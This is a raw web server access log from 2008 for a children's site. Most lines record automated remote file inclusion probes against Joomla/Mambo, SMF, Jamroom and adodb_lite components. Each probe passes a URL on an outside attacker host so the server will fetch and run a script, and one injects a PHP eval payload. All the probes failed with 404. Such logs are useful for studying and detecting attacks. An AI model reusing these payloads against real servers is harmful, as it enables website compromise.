87.106.245.44 - - [21/Nov/2008:00:49:14 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://mozac.edu.my//lib/.../idscan8%0D?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
210.59.227.15 - - [21/Nov/2008:00:51:21 -0700] "GET /logs/access_log.old//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
210.59.227.15 - - [21/Nov/2008:00:51:22 -0700] "GET //administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
210.59.227.15 - - [21/Nov/2008:00:51:22 -0700] "GET /logs//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
210.59.227.15 - - [21/Nov/2008:00:52:19 -0700] "GET /logs/access_log//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
210.59.227.15 - - [21/Nov/2008:00:52:32 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
67.195.37.107 - - [21/Nov/2008:00:54:32 -0700] "GET /logs/error_log.old HTTP/1.0" 200 565248 www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
209.200.255.50 - - [21/Nov/2008:00:54:34 -0700] "GET /logs/access_log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
209.200.255.50 - - [21/Nov/2008:00:54:37 -0700] "GET /logs/access_log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
209.200.255.50 - - [21/Nov/2008:00:54:38 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
209.200.255.50 - - [21/Nov/2008:00:54:38 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
209.200.255.50 - - [21/Nov/2008:00:54:41 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
209.200.255.50 - - [21/Nov/2008:00:54:41 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
209.200.255.50 - - [21/Nov/2008:00:54:51 -0700] "GET /logs/access_log.old//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
209.200.255.50 - - [21/Nov/2008:00:54:51 -0700] "GET /logs/access_log.old//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.810" "-"
210.59.227.15 - - [21/Nov/2008:00:56:01 -0700] "GET /logs/index.php?contenido=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
210.59.227.15 - - [21/Nov/2008:00:56:04 -0700] "GET /index.php?contenido=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
209.200.255.50 - - [21/Nov/2008:00:56:29 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
209.200.255.50 - - [21/Nov/2008:00:56:29 -0700] "GET /logs/access_log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
209.200.255.50 - - [21/Nov/2008:00:56:29 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
209.200.255.50 - - [21/Nov/2008:00:56:57 -0700] "GET /logs/access_log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "-"
209.200.255.50 - - [21/Nov/2008:00:56:57 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "-"
209.200.255.50 - - [21/Nov/2008:00:57:06 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "-"
209.200.255.50 - - [21/Nov/2008:00:57:07 -0700] "GET /logs/access_log.old//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
209.200.255.50 - - [21/Nov/2008:00:57:28 -0700] "GET /logs/access_log.old//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "-"
61.8.3.74 - - [21/Nov/2008:00:57:39 -0700] "GET /logs/access_log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
61.8.3.74 - - [21/Nov/2008:00:57:40 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
61.8.3.74 - - [21/Nov/2008:00:57:40 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
89.186.1.54 - - [21/Nov/2008:00:58:06 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.800" "-"
89.186.1.54 - - [21/Nov/2008:00:58:06 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.800" "-"
89.186.1.54 - - [21/Nov/2008:00:58:08 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.800" "-"
89.186.1.54 - - [21/Nov/2008:00:58:09 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.800" "-"
210.59.227.15 - - [21/Nov/2008:00:58:57 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
210.59.227.15 - - [21/Nov/2008:00:59:01 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
210.59.227.15 - - [21/Nov/2008:00:59:28 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
210.59.227.15 - - [21/Nov/2008:00:59:28 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
61.8.3.74 - - [21/Nov/2008:00:59:29 -0700] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
89.186.1.54 - - [21/Nov/2008:01:00:21 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.800" "-"
89.186.1.54 - - [21/Nov/2008:01:00:24 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://billing.magnoliasouth.com//include/scripts/idscan9?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.800" "-"
210.59.227.15 - - [21/Nov/2008:01:01:11 -0700] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
61.8.3.74 - - [21/Nov/2008:01:02:12 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
61.8.3.74 - - [21/Nov/2008:01:02:13 -0700] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
87.106.245.44 - - [21/Nov/2008:01:04:50 -0700] "GET /logs/error_log.old//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://mozac.edu.my//lib/.../idscan8%0D?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
87.106.245.44 - - [21/Nov/2008:01:04:50 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://mozac.edu.my//lib/.../idscan8%0D?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
87.106.245.44 - - [21/Nov/2008:01:04:50 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://mozac.edu.my//lib/.../idscan8%0D?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
87.106.245.44 - - [21/Nov/2008:01:05:01 -0700] "GET /logs/access_log.old//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://mozac.edu.my//lib/.../idscan8%0D?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
61.8.3.74 - - [21/Nov/2008:01:06:36 -0700] "GET /logs/access_log.old//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
61.8.3.74 - - [21/Nov/2008:01:06:36 -0700] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
61.8.3.74 - - [21/Nov/2008:01:06:37 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
210.59.227.15 - - [21/Nov/2008:01:08:33 -0700] "GET /logs/access_log.old/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
210.59.227.15 - - [21/Nov/2008:01:08:33 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
210.59.227.15 - - [21/Nov/2008:01:08:35 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
61.8.3.74 - - [21/Nov/2008:01:12:23 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
61.8.3.74 - - [21/Nov/2008:01:12:23 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
87.106.245.44 - - [21/Nov/2008:01:12:53 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/alatt/idscan9?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
82.102.10.26 - - [21/Nov/2008:01:13:29 -0700] "GET /logs/access_log//smf/?sourcedir=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "-"
82.102.10.26 - - [21/Nov/2008:01:13:29 -0700] "GET //smf/?sourcedir=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "-"
82.102.10.26 - - [21/Nov/2008:01:13:29 -0700] "GET /logs//smf/?sourcedir=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "-"
82.102.10.26 - - [21/Nov/2008:01:13:55 -0700] "GET /logs/access_log.old//smf/?sourcedir=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "-"
87.106.245.44 - - [21/Nov/2008:01:13:56 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/alatt/idscan9?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
87.106.245.44 - - [21/Nov/2008:01:13:56 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/alatt/idscan9?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
87.106.245.44 - - [21/Nov/2008:01:13:59 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/alatt/idscan9?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
87.106.245.44 - - [21/Nov/2008:01:13:59 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/alatt/idscan9?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
82.102.10.26 - - [21/Nov/2008:01:14:32 -0700] "GET /logs/access_log//smf/?sourcedir=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "-"
82.102.10.26 - - [21/Nov/2008:01:14:32 -0700] "GET //smf/?sourcedir=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "-"
82.102.10.26 - - [21/Nov/2008:01:14:32 -0700] "GET /logs//smf/?sourcedir=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "-"
82.102.10.26 - - [21/Nov/2008:01:14:50 -0700] "GET /logs/access_log.old//smf/?sourcedir=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "-"
150.164.65.65 - - [21/Nov/2008:01:15:22 -0700] "GET /logs/access_log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
150.164.65.65 - - [21/Nov/2008:01:15:22 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
150.164.65.65 - - [21/Nov/2008:01:15:23 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
72.46.126.214 - - [21/Nov/2008:01:15:57 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.jeondae.es.kr/bbs//skin/zero_vote/ooid.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
82.102.10.26 - - [21/Nov/2008:01:16:42 -0700] "GET //smf/?sourcedir=http://www.geocities.com/tutimasripah/ide.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.814" "-"
82.102.10.26 - - [21/Nov/2008:01:16:42 -0700] "GET /logs//smf/?sourcedir=http://www.geocities.com/tutimasripah/ide.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.814" "-"
150.164.65.65 - - [21/Nov/2008:01:16:53 -0700] "GET /logs/access_log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
150.164.65.65 - - [21/Nov/2008:01:16:59 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
150.164.65.65 - - [21/Nov/2008:01:16:59 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/v7id.txt???? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
87.106.245.44 - - [21/Nov/2008:01:17:01 -0700] "GET /logs/access_log/joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/alatt/idscan9?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
87.106.245.44 - - [21/Nov/2008:01:17:01 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/alatt/idscan9?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
87.106.245.44 - - [21/Nov/2008:01:17:02 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.freewebs.com/alatt/idscan9?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
210.59.227.15 - - [21/Nov/2008:01:18:11 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
210.59.227.15 - - [21/Nov/2008:01:18:12 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
210.59.227.15 - - [21/Nov/2008:01:18:26 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
210.59.227.15 - - [21/Nov/2008:01:18:26 -0700] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
72.46.126.214 - - [21/Nov/2008:01:18:54 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.jeondae.es.kr/bbs//skin/zero_vote/ooid.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
72.46.126.214 - - [21/Nov/2008:01:18:54 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.jeondae.es.kr/bbs//skin/zero_vote/ooid.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
72.46.126.214 - - [21/Nov/2008:01:18:57 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.jeondae.es.kr/bbs//skin/zero_vote/ooid.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
72.46.126.214 - - [21/Nov/2008:01:18:57 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.jeondae.es.kr/bbs//skin/zero_vote/ooid.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
222.233.52.18 - - [21/Nov/2008:01:19:04 -0700] "GET /logs/access_log//smf/?sourcedir=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "-"
222.233.52.18 - - [21/Nov/2008:01:19:04 -0700] "GET //smf/?sourcedir=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "-"
222.233.52.18 - - [21/Nov/2008:01:19:04 -0700] "GET /logs//smf/?sourcedir=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "-"
72.46.126.214 - - [21/Nov/2008:01:19:37 -0700] "GET /logs/access_log.old/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.jeondae.es.kr/bbs//skin/zero_vote/ooid.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
72.46.126.214 - - [21/Nov/2008:01:19:37 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.jeondae.es.kr/bbs//skin/zero_vote/ooid.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
72.46.126.214 - - [21/Nov/2008:01:19:37 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.jeondae.es.kr/bbs//skin/zero_vote/ooid.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
222.233.52.18 - - [21/Nov/2008:01:19:51 -0700] "GET /logs/access_log.old//smf/?sourcedir=http://www.vortexguild.org/phpRaider//authentication/smf/idv6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "-"
210.59.227.15 - - [21/Nov/2008:01:20:15 -0700] "GET /logs/access_log.old//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
210.59.227.15 - - [21/Nov/2008:01:20:15 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
210.59.227.15 - - [21/Nov/2008:01:20:20 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
67.195.37.107 - - [21/Nov/2008:01:23:14 -0700] "GET /robots.txt HTTP/1.0" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
67.195.37.107 - - [21/Nov/2008:01:23:15 -0700] "GET /logs/?N=D HTTP/1.0" 200 1074 www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
